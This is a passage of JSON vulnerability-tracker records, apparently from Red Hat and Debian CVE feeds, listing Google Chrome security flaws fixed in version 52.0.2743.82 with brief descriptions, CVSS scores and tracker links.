"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5127"], "modified": "2020-08-18T08:30:15", "id": "RH:CVE-2016-5127", "href": "https://access.redhat.com/security/cve/cve-2016-5127", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T13:55:00", "description": "Multiple unspecified vulnerabilities 
in Google Chrome before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:20:01", "type": "redhatcve", "title": "CVE-2016-1705", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705"], "modified": "2020-08-18T08:27:44", "id": "RH:CVE-2016-1705", "href": "https://access.redhat.com/security/cve/cve-2016-1705", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T04:42:43", "description": "The CSPSource::schemeMatches function in WebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy (CSP) implementation in Blink, as used in Google Chrome before 52.0.2743.82, does not apply http :80 policies to https :443 URLs and does not apply ws :80 policies to wss :443 URLs, which makes it easier for remote attackers to determine whether a specific HSTS web site has been visited by reading a CSP report. 
NOTE: this vulnerability is associated with a specification change after CVE-2016-1617 resolution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-07-21T08:19:25", "type": "redhatcve", "title": "CVE-2016-5137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-5137"], "modified": "2020-08-18T08:30:46", "id": "RH:CVE-2016-5137", "href": "https://access.redhat.com/security/cve/cve-2016-5137", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-02T22:53:46", "description": "net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Google Chrome before 52.0.2743.82 does not ensure that URL information is restricted to a scheme, host, and port, which allows remote attackers to discover credentials by operating a server with a PAC script, a related issue to CVE-2016-3763.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": 
"NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:21", "type": "redhatcve", "title": "CVE-2016-5134", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3763", "CVE-2016-5134"], "modified": "2020-08-18T08:30:37", "id": "RH:CVE-2016-5134", "href": "https://access.redhat.com/security/cve/cve-2016-5134", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:15", "description": "Use-after-free vulnerability in extensions/renderer/user_script_injector.cc in the Extensions subsystem in Google Chrome before 52.0.2743.82 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to script deletion.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5136"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5136", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "ios/web/web_state/ui/crw_web_controller.mm in Google Chrome before 52.0.2743.82 on iOS does not ensure that an invalid URL is replaced with the about:blank URL, which allows remote attackers to spoof the URL display via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1707", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1707"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1707", "href": 
"https://security-tracker.debian.org/tracker/CVE-2016-1707", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:15", "description": "The Service Workers subsystem in Google Chrome before 52.0.2743.82 does not properly implement the Secure Contexts specification during decisions about whether to control a subframe, which allows remote attackers to bypass the Same Origin Policy via an https IFRAME element inside an http IFRAME element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5132", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5132"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5132", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5132", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "The PPAPI implementation in Google Chrome before 52.0.2743.82 does not validate the origin of IPC messages to the plugin broker process that should have come from the browser process, which allows remote attackers to 
bypass a sandbox protection mechanism via an unexpected message type, related to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc, ppapi_thread.cc, and render_frame_message_filter.cc.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1706", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1706"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1706", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T17:47:15", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5128", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5128", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Google Chrome before 52.0.2743.82 mishandles origin information during proxy authentication, which allows man-in-the-middle attackers to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5133", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5133", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5133", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:15", "description": "The Chrome Web Store inline-installation implementation in the Extensions subsystem in Google Chrome before 52.0.2743.82 does not properly consider object lifetimes during progress observation, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1708", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2016-1708"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1708", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1708", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Heap-based buffer overflow in the ByteArray::Get method in data/byte_array.cc in Google sfntly before 2016-06-10, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted SFNT font.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1709", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1709"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1709", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote 
attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5129", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5129", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "The ChromeClientImpl::createWindow method in WebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not prevent window creation by a deferred frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", 
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1710", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1710"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1710", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "content/renderer/history_controller.cc in Google Chrome before 52.0.2743.82 does not properly restrict multiple uses of a JavaScript forward method, which allows remote attackers to spoof the URL display via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5130", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", 
"availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5130"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5130", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5130", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T14:41:10", "description": "Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5131", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5131", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5131", "cvss": 
{"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not consider referrer-policy information inside an HTML document during a preload request, which allows remote attackers to bypass the Content Security Policy (CSP) protection mechanism via a crafted web site, as demonstrated by a \"Content-Security-Policy: referrer origin-when-cross-origin\" header that overrides a \"<META name='referrer' content='no-referrer'>\" element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5135", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5135"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5135", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5135", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:15", "description": "WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not 
disable frame navigation during a detach operation on a DocumentLoader object, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1711", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1711"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1711", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1711", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp in Blink, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", 
